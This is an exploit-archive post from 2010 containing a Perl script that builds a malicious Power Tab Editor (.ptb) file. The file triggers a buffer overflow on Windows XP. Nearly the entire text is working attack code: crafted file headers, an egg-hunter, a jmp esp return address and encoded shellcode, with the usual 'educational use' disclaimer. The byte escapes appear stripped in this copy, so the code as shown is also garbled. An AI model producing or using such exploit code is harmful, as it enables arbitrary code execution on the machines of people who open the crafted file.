Power Tab Editor v1.7 (Build 80) Buffer Overflow

Posted on 11 June 2010
<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01 Transitional//EN'><html><head><meta http-equiv='Content-Type' content='text/html; charset=windows-1251'><title>Power Tab Editor v1.7 (Build 80) Buffer Overflow</title><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon'><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss'></head><body><pre>================================================
Power Tab Editor v1.7 (Build 80) Buffer Overflow
================================================


#***********************************************************************************
# Exploit Title : Power Tab Editor v1.7 (Build 80)
# Date          : 07/06/2010
# Author        : Sud0
# Bug found by  : Sud0
# Software Link : http://www.power-tab.net/guitar.php
# Version       : v1.7 (Build 80)
# OS            : Windows
# Tested on     : XP SP3 En (VirtualBox)
# Type of vuln  : EIP / SEH
# Thanks to my wife for her support
# Congratz to markot for his new baby Manuel
# Greetz to: Corelan Security Team
# http://www.corelan.be:8800/index.php/security/corelan-team-members/
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# Script provided 'as is', without any warranty.
# Use for educational purposes only.
# Do not use this code to do anything illegal !
# Corelan does not want anyone to use this script
# for malicious and/or illegal purposes
# Corelan cannot be held responsible for any illegal use.
#
# Note : you are not allowed to edit/modify this code.
# If you do, Corelan cannot be held responsible for any damages this may cause.
#***********************************************************************************
#code :
print &quot;|------------------------------------------------------------------|
&quot;;
print &quot;|                         __               __                      |
&quot;;
print &quot;|   _________  ________  / /___ _____     / /____  ____ _____ ___  |
&quot;;
print &quot;|  / ___/ __ \/ ___/ _ \/ / __ `/ __ \   / __/ _ \/ __ `/ __ `__ \ |
&quot;;
print &quot;| / /__/ /_/ / /  /  __/ / /_/ / / / /  / /_/  __/ /_/ / / / / / / |
&quot;;
print &quot;| \___/\____/_/   \___/_/\__,_/_/ /_/   \__/\___/\__,_/_/ /_/ /_/  |
&quot;;
print &quot;|                                                                  |
&quot;;
print &quot;|                                       http://www.corelan.be:8800 |
&quot;;
print &quot;|                                                                  |
&quot;;
print &quot;|-------------------------------------------------[ EIP Hunters ]--|

&quot;;
print &quot;[+] Exploit for Power Tab Editor v1.7 b80
&quot;;
 
my $filename=&quot;poc.ptb&quot;;
my $junk = &quot;x20&quot; x 463;
my  $footer =     &quot;x08x00x00x00x90x01x00x00x00x00x00x00x00x00x00x0F&quot;.
    &quot;x54x69x6Dx65x73x20x4Ex65x77x20x52x6Fx6Dx61x6Ex08&quot;.
    &quot;x00x00x00x90x01x00x00x00x00x00x00x00x00x00x0Fx54&quot;.
    &quot;x69x6Dx65x73x20x4Ex65x77x20x52x6Fx6Dx61x6Ex08x00&quot;.
    &quot;x00x00x90x01x00x00x00x00x00x00x00x00x00x09x00x00&quot;.
    &quot;x00x00x00x00x00x00x00x00x00&quot;;
 
my $egg=     &quot;x66x81xCAxFFx0Fx42x52x6Ax43x58xCDx2Ex3Cx05x5Ax74xEFxB8x77x30x30x74x8BxFAxAFx75xEAxAFx75xE7xFFxE7&quot;;
 
my  $buffer  = &quot;ptab&quot; . &quot;x04x00x00x00xFFxCFx01&quot;;             # File Header
     
    $buffer .= $junk ;
    $buffer .=    &quot;x00x00x02x00xDAx07x00x00x00x00x00x00x00x00x00x00&quot; ; # basic config for ptb file
    $buffer .=    &quot;x00x01x00xFFxFFx01x00x07x00x43x47x75x69x74x61x72&quot; ; # basic config for ptb file
    $buffer .=    &quot;x00x08x55x6Ex74x69x74x6Cx65x64x18x68x40x00x00x00&quot; ; # basic config for ptb file
    $buffer .=    &quot;x00x00x08x53x74x61x6Ex64x61x72x64x01x06x40x3Bx37&quot; ; # basic config for ptb file
    $buffer .=    &quot;x32x2Dx28x00x00x00x00x01x00xFFxFFx01x00x09x00x43&quot; ; # basic config for ptb file
    $buffer .=    &quot;x47x75x69x74x61x72x49x6Ex00x00x00x00x00x01x00x00&quot; ; # basic config for ptb file
    $buffer .=    &quot;x00x00x00x00x01x00xFFxFFx01x00x08x00x43x53x65x63&quot; ; # basic config for ptb file
    $buffer .=    &quot;x74x69x6Fx6Ex32x00x00x00x14x00x00x00x20x03x00x00&quot; ; # basic config for ptb file
    $buffer .=    &quot;x8Fx00x00x00x00x14x00x00x00x00x00x10x00x80x11x1A&quot; ; # basic config for ptb file
    $buffer .=    &quot;x04x7Fx00x00x00x00x00x00x00x01x00xFFxFFx01x00x06&quot; ; # basic config for ptb file
    $buffer .=    &quot;x00x43x53x74x61x66x66x06x09x09x11x00x00x00x00x00&quot; ; # basic config for ptb file
    $buffer .=    &quot;x00x00x01x00x01x80x00x08x55x6Ex74x69x74x6Cx65x64&quot; ; # basic config for ptb file
    $buffer .=    &quot;x21x68x40x00x00x00x00x00x04x42x61x73x73x01x04x2B&quot; ; # basic config for ptb file
    $buffer .=    &quot;x26x21x1Cx00x00x00x00x01x00x03x80x00x00x00x00x00&quot; ; # basic config for ptb file
    $buffer .=    &quot;x01x00x00x00x00x00x00x01x00x05x80x32x00x00x00x14&quot; ; # basic config for ptb file
    $buffer .=    &quot;x00x00x00x20x03x00x00x7Dx00x00x00x00x14x00x00x00&quot; ; # basic config for ptb file
    $buffer .=    &quot;x00x00x10x00x80x11x1Ax04x7Fx00x00x00x00x00x00x00&quot; ; # basic config for ptb file
    $buffer .=    &quot;x01x00x07x80x14x09x09x11x00x00x00x00x00x00x00x05&quot; ; # basic config for ptb file
 
    $buffer .= &quot;Arial&quot; . &quot;A&quot; x 18;      # Font here where the Buffer Overflow occures
    $buffer .= $egg;
    $buffer .= &quot;A&quot; x 18;            # some junk
    $buffer .= &quot;xDCx3AxB4x76&quot;;      # jmp esp from winmm.dll may be changed
    $buffer .= &quot;x90&quot; x 4;          # somz NOPs
    $buffer .= &quot;xEBxC4&quot; ;         # Jump Backward to egg bunter
    $buffer .= &quot;xccx00x36x00&quot;;      # ptb file separator
    $buffer .= &quot;A&quot; x 918;           # some junk
    $buffer .= $footer;         # ptb file footer
$shellcode = &quot;w00tw00t&quot; .  &quot;WYIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJIhYjKMKn92Ta4kDDqXRX2qjp1KyPdLKqadpnkaf4LNkrVELLKsvUXnkcNgPnk6VvXroWhrUJSv931N1kOiqSPLKRLtd5tNkcuWLlKPTWupxvakZNkpJWhnkSjgP5QJKxcVW1YNkVTLKEQxnfQ9oP1kpylnLK4kpT4WzYQZoVm5Qjg9yZQKOyoKOEkqlVDQ81eknLK1JUtS1zKSVlKvlpKNkRzwlwqJKnk7tLKc1KXoyStQ4eLE1iSOBwxeyKdOyhelIKrQxlNRntNzLPRixMLiokOkONiRewtmkcNkhkRQcLGeL6D0RM8NkyokOKOniSu38qxPl2LUpkO58Ucp2fNqt3XSEt32ESBOxQLWTtJOyJFv6KOSeFdLIYRRpoKnHMr2mmlmWWlutpRkX3nKOkOkOqxPLQQBnPXu8csRoV2W5VQyKNh1LTdUWoyHcPh2USUBLbxsXUp0MU1pnsX3RrO2U2T2HROT45ppa3XPmsQSBu3QxUprTrOUp1x2RcQRT2ZqxU3bORNQwu8qcwPFZUpphGPpsQq493XRs2UQtvPEayYoxpLutVKMYHaFQKbqB63PQ629oJp6QIPBpYoruWxWzA&quot;;
 
    $buffer .=$shellcode;
 
print &quot;Removing old $filename file
&quot;;
system(&quot;del $filename&quot;);
print &quot;Creating new $filename file
&quot;;
open(FILE, &quot;&gt;$filename&quot;);
 
print FILE $buffer;
close(FILE);


# <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-06-11]</pre><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></body></html>
TOP
Malware :

Last 20
Exploits :

Last 20